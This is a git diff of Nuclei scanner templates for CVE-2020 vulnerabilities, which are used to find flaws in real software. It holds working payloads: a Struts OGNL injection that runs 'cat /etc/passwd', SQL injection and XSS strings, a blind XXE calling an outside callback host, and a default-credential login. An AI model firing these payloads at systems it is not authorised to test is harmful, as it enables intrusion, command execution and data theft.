session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY - req-condition: true matchers-condition: and matchers: + - type: dsl + dsl: + - "contains(body_1, 'Redirecting...')" + - "status_code_1 == 302" + condition: and + - type: word part: body_2 words: @@ -45,11 +58,4 @@ requests: - "SLA Misses" - "Task Instances" condition: and - - - type: dsl - dsl: - - "contains(body_1, 'Redirecting...')" - - "status_code_1 == 302" - condition: and - -# Enhanced by md on 2022/10/19 +# digest: 4a0a00473045022100f9b0843697463f8e60b12ec56ef0932060ae2d860b8921f95740b592f274713f022053fcc5e9356e6480fab005b56bb10b6931ef145cd764ba9a91e7b44715fcb0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-17530.yaml b/nuclei-templates/CVE-2020/CVE-2020-17530.yaml index 6b3c814131..3e281da466 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-17530.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-17530.yaml @@ -1,30 +1,31 @@ id: CVE-2020-17530 + info: - name: Apache Struts 2.0.0-2.5.25 - Remote Code Execution + name: Apache Struts RCE author: pikpikcu severity: critical - description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it. reference: - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - http://jvn.jp/en/jp/JVN43969166/index.html - https://cwiki.apache.org/confluence/display/WW/S2-061 - https://security.netapp.com/advisory/ntap-20210115-0005/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-17530 + tags: cve,cve2020,apache,rce,struts + description: | + Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-17530 cwe-id: CWE-917 - tags: cve,cve2020,apache,rce,struts + requests: - method: GET path: - "{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - -# Enhanced by mp on 2022/04/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-18268.yaml b/nuclei-templates/CVE-2020/CVE-2020-18268.yaml new file mode 100644 index 0000000000..ba4395254f --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-18268.yaml @@ -0,0 +1,50 @@ +id: CVE-2020-18268 + +info: + name: Z-Blog <=1.5.2 - Open Redirect + author: 0x_Akoko + severity: medium + description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. + remediation: | + Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability. + reference: + - https://github.com/zblogcn/zblogphp/issues/216 + - https://github.com/zblogcn/zblogphp/issues/209 + - https://nvd.nist.gov/vuln/detail/CVE-2020-18268 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-18268 + cwe-id: CWE-601 + epss-score: 0.00147 + epss-percentile: 0.49792 + cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: zblogcn + product: z-blogphp + tags: cve,cve2020,redirect,zblogphp,authenticated,zblogcn + +http: + - raw: + - | + POST /zb_system/cmd.php?act=verify HTTP/1.1 + Host: {{Hostname}} + Content-Length: 81 + Content-Type: application/x-www-form-urlencoded + Connection: close + + btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 + - | + GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2 + Host: {{Hostname}} + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100bd3922005e2f1f83e8fc6d03ed0821320876192c346fd423f1e365de6eecda67022007afefdc8787c536742bd021c8c77fecf9c9783282077289ed30c3e2ee522665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-19282.yaml b/nuclei-templates/CVE-2020/CVE-2020-19282.yaml deleted file mode 100644 index b89e24088b..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-19282.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2020-19282 -info: - name: Jeesns 1.4.2 XSS - author: pikpikcu - severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. - reference: - - https://github.com/zchuanzhao/jeesns/issues/11 - - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 - - https://www.seebug.org/vuldb/ssvid-97940 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-19282 - cwe-id: CWE-79 - tags: cve,cve2020,jeesns,xss -requests: - - method: GET - path: - - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2020/cve-2020-1938.yaml b/nuclei-templates/CVE-2020/CVE-2020-1938.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1938.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1938.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-19515.yaml b/nuclei-templates/CVE-2020/CVE-2020-19515.yaml index 6be6bcce80..cf7850d5de 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-19515.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-19515.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2020-19515 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41374 + epss-percentile: 0.41242 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 - tags: cve,cve2020,xss,qdpm,unauth + tags: cve2020,cve,xss,qdpm,unauth http: - method: GET @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f8cc92b579ee4fd8b503bcc9846cf6a25beb583f0d7ad885af5f875f4230b0fa02202a34c318390b57b32c65ce37a6dd2a1f8f9d1dfcac54f163c63d462ebe7b5b69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205447757079347b8070e89fe60975aa83c5f776a495770b9fe12acf27f046e0030220569d1f8e17b6d601ebb193264cb7fab1e1dea5fdb12a553bd34fd8f502786c21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-1956.yaml b/nuclei-templates/CVE-2020/CVE-2020-1956.yaml deleted file mode 100644 index 035b347767..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-1956.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2020-1956 - -info: - name: Apache Kylin弱口令到rce - author: Str1am - severity: high - tags: Kylin,rce - -requests: - - raw: - - | - POST /kylin/api/user/authentication HTTP/1.1 - Host: {{Hostname}} - Pragma: no-cache - Accept: application/json, text/plain, */* - Authorization: Basic QURNSU46S1lMSU4= - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "userDetails" - part: body - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-19625.yaml b/nuclei-templates/CVE-2020/CVE-2020-19625.yaml new file mode 100644 index 0000000000..ba85b67fc6 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-19625.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-19625 +info: + name: Gridx 1.3 RCE + author: geeknik + description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. + reference: https://github.com/oria/gridx/issues/433 + severity: critical + tags: cve,cve2020,gridx,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-19625 + +requests: + - method: GET + path: + - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + extractors: + - type: regex + part: body + group: 1 + regex: + - '

PHP Version ([0-9.]+)<\/h1>' diff --git a/nuclei-templates/CVE-2020/CVE-2020-20285.yaml b/nuclei-templates/CVE-2020/CVE-2020-20285.yaml index 859834c7df..e7993a1d98 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-20285.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-20285.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20285 @@ -14,12 +18,18 @@ info: cvss-score: 5.4 cve-id: CVE-2020-20285 cwe-id: CWE-79 + epss-score: 0.0009 + epss-percentile: 0.37789 + cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: zzcms + product: zzcms fofa-query: zzcms - verified: "true" - tags: cve,cve2020,zzcms,xss + tags: cve2020,cve,zzcms,xss -requests: +http: - raw: - | GET /user/login.php HTTP/1.1 @@ -41,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/17 +# digest: 4a0a0047304502202c9b0b05dd0d5566e148b27219b5d138bebd927b962661d892abffc7ab6c129a022100c423a96886f0bd34eb700de5fdb5508c514ad9ab63c39a03069d86fa47b9139f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-20300.yaml b/nuclei-templates/CVE-2020/CVE-2020-20300.yaml index afad4d7ea2..a2a35f76f7 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-20300.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-20300.yaml @@ -5,21 +5,33 @@ info: author: pikpikcu severity: critical description: WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to a patched version of WeiPHP or apply the vendor-supplied patch to fix the SQL Injection vulnerability. reference: - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20300 - https://github.com/Y4er/Y4er.com/blob/master/content/post/weiphp-exp-sql.md + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cwe-id: CWE-89 cve-id: CVE-2020-20300 + cwe-id: CWE-89 + epss-score: 0.20647 + epss-percentile: 0.96263 + cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: weiphp + product: weiphp shodan-query: http.html:"WeiPHP5.0" - verified: "true" - tags: weiphp,sql + tags: cve,cve2020,weiphp,sql,sqli -requests: +http: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " @@ -34,5 +46,4 @@ requests: - type: status status: - 500 - -# Enhanced by mp on 2022/09/28 +# digest: 4b0a00483046022100d8797af312f8278f5b2970883e169d0005026e8cf66544ea1c56f941fa37a2ab022100f9e0d410a6eafe296be9a17b89b19819a22377b358619a3abc0d1ec6df6e69ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-2096.yaml b/nuclei-templates/CVE-2020/CVE-2020-2096.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-2096.yaml rename to nuclei-templates/CVE-2020/CVE-2020-2096.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-20988.yaml b/nuclei-templates/CVE-2020/CVE-2020-20988.yaml new file mode 100644 index 0000000000..3068593902 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-20988.yaml @@ -0,0 +1,43 @@ +id: CVE-2020-20988 +info: + name: DomainMOD 4.13.0 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via reporting/domains/cost-by-owner.php in "or Expiring Between" parameter. + reference: + - https://mycvee.blogspot.com/p/xss2.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-20988 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2020,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /reporting/domains/cost-by-owner.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + cookie-reuse: true + req-condition: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(all_headers_2, "text/html")' + - 'contains(body_2, "value=\"\"/>")' + - 'contains(body_2, "DomainMOD")' + condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-21012.yaml b/nuclei-templates/CVE-2020/CVE-2020-21012.yaml index 1b77bed559..f980c8c7c8 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-21012.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-21012.yaml @@ -6,20 +6,31 @@ info: severity: critical description: | Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0. reference: - https://github.com/hitIer/web_test/tree/master/hotel - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html - https://nvd.nist.gov/vuln/detail/CVE-2020-21012 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 + epss-score: 0.07235 + epss-percentile: 0.93887 + cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2020,hotel,sqli,unauth + verified: true + max-request: 1 + vendor: hotel_and_lodge_booking_management_system_project + product: hotel_and_lodge_booking_management_system + tags: cve,cve2020,hotel,sqli,unauth,hotel_and_lodge_booking_management_system_project -requests: +http: - raw: - | POST /forgot_password.php HTTP/1.1 @@ -35,5 +46,4 @@ requests: - 'status_code == 200' - 'contains(body, "Hotel Booking System")' condition: and - -# Enhanced by md on 2022/12/08 +# digest: 4a0a00473045022100ea99d63de90c17ef69343663ae409245371b719ba54e6602d603d1104a3cad99022075d17848133ba876d97f93a848b051ebb60d538253ef1ba0dc3a1c8f0df532fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-2103.yaml b/nuclei-templates/CVE-2020/CVE-2020-2103.yaml deleted file mode 100644 index a8199bbc1a..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-2103.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2020-2103 - -info: - name: Diagnostic page exposed session cookies - severity: medium - author: c-sh0 - description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 - - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - metadata: - shodan-query: http.favicon.hash:81586312 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.40 - cve-id: CVE-2020-2103 - cwe-id: CWE-200 - tags: cve,cve2020,jenkins - -requests: - - raw: - - | - GET {{BaseURL}}/whoAmI/ HTTP/1.1 - Host: {{Hostname}} - - - | - GET {{BaseURL}}/whoAmI/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'text/html' - - 'x-jenkins' - condition: and - case-insensitive: true - - - type: word - part: body_2 - words: - - 'Cookie' - - 'SessionId: null' - condition: and - - extractors: - - type: kval - kval: - - x_jenkins \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-2199.yaml b/nuclei-templates/CVE-2020/CVE-2020-2199.yaml deleted file mode 100644 index a79aa5cb82..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-2199.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: CVE-2020-2199 -info: - name: Nexus Repository Manager RCE - author: medbsq - severity: high -#https://www.cvebase.com/cve/2020/10199 -requests: - - method: POST - path: - - "{{BaseURL}}/rest/beta/repositories/go/group" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Content-Type: application/json - body: "{\"name\": \"internal\",\"online\": true,\"storage\": {\"blobStoreName\": \"default\",\"strictContentTypeValidation\": true},\"group\": {\"memberNames\": [\"$\\c{ 1337 * 1337 }\"]}}" - matchers-condition: and - matchers: - - type: word - words: - - "1787569" - part: body - - type: status - status: - - 400 diff --git a/nuclei-templates/CVE-2020/CVE-2020-22208.yaml b/nuclei-templates/CVE-2020/CVE-2020-22208.yaml index ff8cb13e1b..f447227d0e 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-22208.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-22208.yaml @@ -1,44 +1,32 @@ id: CVE-2020-22208 - info: name: 74cms - ajax_street.php 'x' SQL Injection author: ritikchaddha severity: critical description: | SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. - impact: | - Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database. - remediation: | - Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability. reference: - https://github.com/blindkey/cve_like/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2020-22208 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22208 + cve-id: CVE-2020-22210 cwe-id: CWE-89 - epss-score: 0.19578 - epss-percentile: 0.9585 - cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: 74cms - product: 74cms - shodan-query: http.html:"74cms" fofa-query: app="74cms" - tags: cve2020,cve,74cms,sqli + shodan-query: http.html:"74cms" + tags: cve,cve2020,74cms,sqli variables: num: "999999999" - -http: +requests: - method: GET path: - '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#' - matchers: - type: word part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100b445b86b8bc851dfc73d48b1385c99d7ad711230fa56e43efd02d7755d29ea84022100bfc90c7ba695df767a9f32c5eb3a29bf895e0af68b1d4c163438eaf8bfc221b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by cs on 2022/06/21 diff --git a/nuclei-templates/CVE-2020/CVE-2020-22210.yaml b/nuclei-templates/CVE-2020/CVE-2020-22210.yaml deleted file mode 100644 index 9ec069316e..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-22210.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2020-22210 - -info: - author: princechaddha - name: 74cms Sql Injection - severity: high - tags: 74cms,sqli - description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-22210 - - https://github.com/blindkey/cve_like/issues/11 - classification: - cve-id: CVE-2020-22210 - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a' - - matchers: - - type: word - words: - - "e807f1fcf82d132f9bb018ca6738a19f" - part: body - -# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/CVE-2020/CVE-2020-22211.yaml b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml index a303d4b08f..a711842702 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-22211.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml @@ -1,5 +1,4 @@ id: CVE-2020-22211 - info: name: 74cms - ajax_street.php 'key' SQL Injection author: ritikchaddha @@ -18,15 +17,12 @@ info: fofa-query: app="74cms" shodan-query: http.html:"74cms" tags: cve,cve2020,74cms,sqli - variables: num: "999999999" - requests: - method: GET path: - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' - matchers: - type: word part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-23015.yaml b/nuclei-templates/CVE-2020/CVE-2020-23015.yaml deleted file mode 100644 index d01da81880..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-23015.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2020-23015 - -info: - name: OPNsense 20.1.5. Open Redirect - author: 0x_Akoko - severity: medium - description: An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter "url" in login page was not filtered and can redirect user to any website. - reference: - - https://github.com/opnsense/core/issues/4061 - - https://www.cvedetails.com/cve/CVE-2020-23015 - tags: cve,cve2020,redirect,opnsense - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-23015 - cwe-id: CWE-601 - -requests: - - method: GET - - path: - - '{{BaseURL}}/?url=http://example.com' - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-23517.yaml b/nuclei-templates/CVE-2020/CVE-2020-23517.yaml deleted file mode 100644 index 6b74f4c605..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-23517.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2020-23517 -info: - name: Aryanic HighMail (High CMS) XSS - author: geeknik - severity: medium - description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. - reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html - tags: xss,cve,cve2020 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-23517 - cwe-id: CWE-79 -requests: - - method: GET - path: - - "{{BaseURL}}/login/?uid=\">" - matchers-condition: and - matchers: - - type: word - words: - - text/html - part: header - - type: word - words: - - "") && contains(body_4, "Monstra")' condition: and @@ -58,10 +64,9 @@ requests: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true - -# Enhanced by md on 2023/02/01 + part: body +# digest: 490a004630440220388c291d21538ae9468cbf1003d57432e845e76f6e5ca57401c295990dbfa3c802201e068fb257170a9fd9eb666b68ebba98a088c87a3f79ab04d71631a4170816d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-23972.yaml b/nuclei-templates/CVE-2020/CVE-2020-23972.yaml index 22960ca182..af1319821d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-23972.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-23972.yaml @@ -1,4 +1,5 @@ id: CVE-2020-23972 + info: name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload author: dwisiswant0 @@ -15,6 +16,7 @@ info: cvss-score: 7.50 cve-id: CVE-2020-23972 cwe-id: CWE-434 + requests: - raw: - | @@ -40,12 +42,14 @@ requests: no_html ------WebKitFormBoundarySHHbUsfCoxlX1bpS-- + payloads: component: - "com_gmapfp" - "comgmapfp" + extractors: - type: regex part: body regex: - - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" + - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-24589.yaml b/nuclei-templates/CVE-2020/CVE-2020-24589.yaml deleted file mode 100644 index d38bafb820..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-24589.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-24589 - -info: - name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection - author: lethargynavigator - severity: critical - description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 - - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H - cvss-score: 9.1 - cve-id: CVE-2020-24589 - tags: cve,cve2020,wso2,xxe,oast,blind - -requests: - - raw: - - | - POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - payload=<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]> - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: body - words: - - "Failed to install the generic artifact type" - -# Enhanced by mp on 2022/04/14 diff --git 